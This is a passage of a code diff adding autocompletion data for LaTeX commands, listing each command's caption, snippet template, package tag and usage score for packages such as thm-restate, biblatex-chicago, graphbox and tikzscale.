0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lapdf-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'lapdf-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'lapdf-cmd', + score: 0.028955796305270766, + }, + ], + nccbbb: [ + { + caption: '\\bbbe', + snippet: '\\bbbe', + meta: 'nccbbb-cmd', + score: 0.0013332214754983353, + }, + { + caption: '\\bbbe[]', + snippet: '\\bbbe[$1]', + meta: 'nccbbb-cmd', + score: 0.0013332214754983353, + }, + { + caption: '\\bbbr', + snippet: '\\bbbr', + meta: 'nccbbb-cmd', + score: 0.0015739010274051707, + }, + ], + tgbonum: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgbonum-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgbonum-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgbonum-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgbonum-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgbonum-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgbonum-cmd', + score: 0.021170869458413965, + }, + ], + 'thm-restate': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-restate-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thm-restate-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + meta: 'thm-restate-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thm-restate-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thm-restate-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thm-restate-cmd', + score: 0.0004904790216915127, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thm-restate-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thm-restate-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thm-restate-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thm-restate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thm-restate-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thm-restate-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thm-restate-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thm-restate-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thm-restate-cmd', + score: 0.0006133100544751855, + }, + ], + 'biblatex-chicago': [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'biblatex-chicago-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'biblatex-chicago-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'biblatex-chicago-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-chicago-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'biblatex-chicago-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'biblatex-chicago-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'biblatex-chicago-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'biblatex-chicago-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'biblatex-chicago-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'biblatex-chicago-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'biblatex-chicago-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'biblatex-chicago-cmd', + score: 0.008565354665444157, + }, + ], + pseudocode: [ + { + caption: '\\shadowbox{}', + snippet: '\\shadowbox{$1}', + meta: 'pseudocode-cmd', + score: 0.00107667147399019, + }, + { + caption: '\\doublebox', + snippet: '\\doublebox', + meta: 'pseudocode-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'pseudocode-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\thisfancypage{}{}', + snippet: '\\thisfancypage{$1}{$2}', + meta: 'pseudocode-cmd', + score: 0.00015142240898356106, + }, + { + caption: '\\TheSbox', + snippet: '\\TheSbox', + meta: 'pseudocode-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pseudocode-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pseudocode-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pseudocode-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pseudocode-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pseudocode-cmd', + score: 0.0018957469739775527, + }, + ], + imakeidx: [ + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'imakeidx-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'imakeidx-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'imakeidx-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'imakeidx-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'imakeidx-cmd', + score: 0.008565354665444157, + }, + ], + uri: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'uri-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'uri-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'uri-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'uri-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'uri-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'uri-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'uri-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'uri-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'uri-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'uri-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'uri-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'uri-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'uri-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'uri-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'uri-cmd', + score: 0.021170869458413965, + }, + ], + tocvsec2: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'tocvsec2-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'tocvsec2-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'tocvsec2-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'tocvsec2-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'tocvsec2-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'tocvsec2-cmd', + score: 0.0018957469739775527, + }, + ], + graphbox: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'graphbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'graphbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'graphbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'graphbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'graphbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'graphbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'graphbox-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'graphbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'graphbox-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'graphbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'graphbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'graphbox-cmd', + score: 0.008565354665444157, + }, + ], + limap: [ + { + caption: '\\MapContinuing{}', + snippet: '\\MapContinuing{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapTextFraction{}', + snippet: '\\MapTextFraction{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapBlockLabelFont{}', + snippet: '\\MapBlockLabelFont{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\Block{}', + snippet: '\\Block{$1}', + meta: 'limap-cmd', + score: 0.011618215341095648, + }, + { + caption: '\\MapRuleWidth{}', + snippet: '\\MapRuleWidth{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapTitleFraction{}', + snippet: '\\MapTitleFraction{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\MapContinued{}', + snippet: '\\MapContinued{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\WideBlock{}', + snippet: '\\WideBlock{$1}', + meta: 'limap-cmd', + score: 0.002453536158989143, + }, + { + caption: '\\MapParskip{}', + snippet: '\\MapParskip{$1}', + meta: 'limap-cmd', + score: 7.216282820556303e-5, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'limap-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'limap-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'limap-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'limap-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'limap-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'limap-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'limap-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'limap-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'limap-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'limap-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'limap-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'limap-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'limap-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'limap-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'limap-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'limap-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'limap-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'limap-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'limap-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'limap-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'limap-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'limap-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'limap-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\endhead', + snippet: '\\endhead', + meta: 'limap-cmd', + score: 0.0023853501147448834, + }, + { + caption: '\\endfoot', + snippet: '\\endfoot', + meta: 'limap-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'limap-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'limap-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\nopagebreak', + snippet: '\\nopagebreak', + meta: 'limap-cmd', + score: 9.952664522415981e-5, + }, + { + caption: '\\endfirsthead', + snippet: '\\endfirsthead', + meta: 'limap-cmd', + score: 0.0016148498709822416, + }, + { + caption: '\\endlastfoot', + snippet: '\\endlastfoot', + meta: 'limap-cmd', + score: 0.00044045261916551967, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'limap-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\tablename', + snippet: '\\tablename', + meta: 'limap-cmd', + score: 0.0029238994233674776, + }, + { + caption: '\\pagebreak', + snippet: '\\pagebreak', + meta: 'limap-cmd', + score: 0.0313525090421608, + }, + ], + tikzscale: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikzscale-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikzscale-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikzscale-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikzscale-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikzscale-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzscale-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikzscale-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikzscale-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikzscale-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tikzscale-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tikzscale-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tikzscale-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tikzscale-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tikzscale-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzscale-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tikzscale-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tikzscale-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tikzscale-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikzscale-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tikzscale-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tikzscale-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tikzscale-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tikzscale-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikzscale-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikzscale-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikzscale-cmd', + score: 0.2864294797053033, + }, + ], + savesym: [ + { + caption: '\\savesymbol{}', + snippet: '\\savesymbol{$1}', + meta: 'savesym-cmd', + score: 6.662041157021826e-5, + }, + ], + subscript: [ + { + caption: '\\textsubscript{}', + snippet: '\\textsubscript{$1}', + meta: 'subscript-cmd', + score: 0.058405875394131175, + }, + ], + letterspace: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'letterspace-cmd', + score: 0.00037306820619479756, + }, + ], + mathastext: [ + { + caption: '\\Huge', + snippet: '\\Huge', + meta: 'mathastext-cmd', + score: 0.04725806985998919, + }, + { + caption: '\\sfdefault', + snippet: 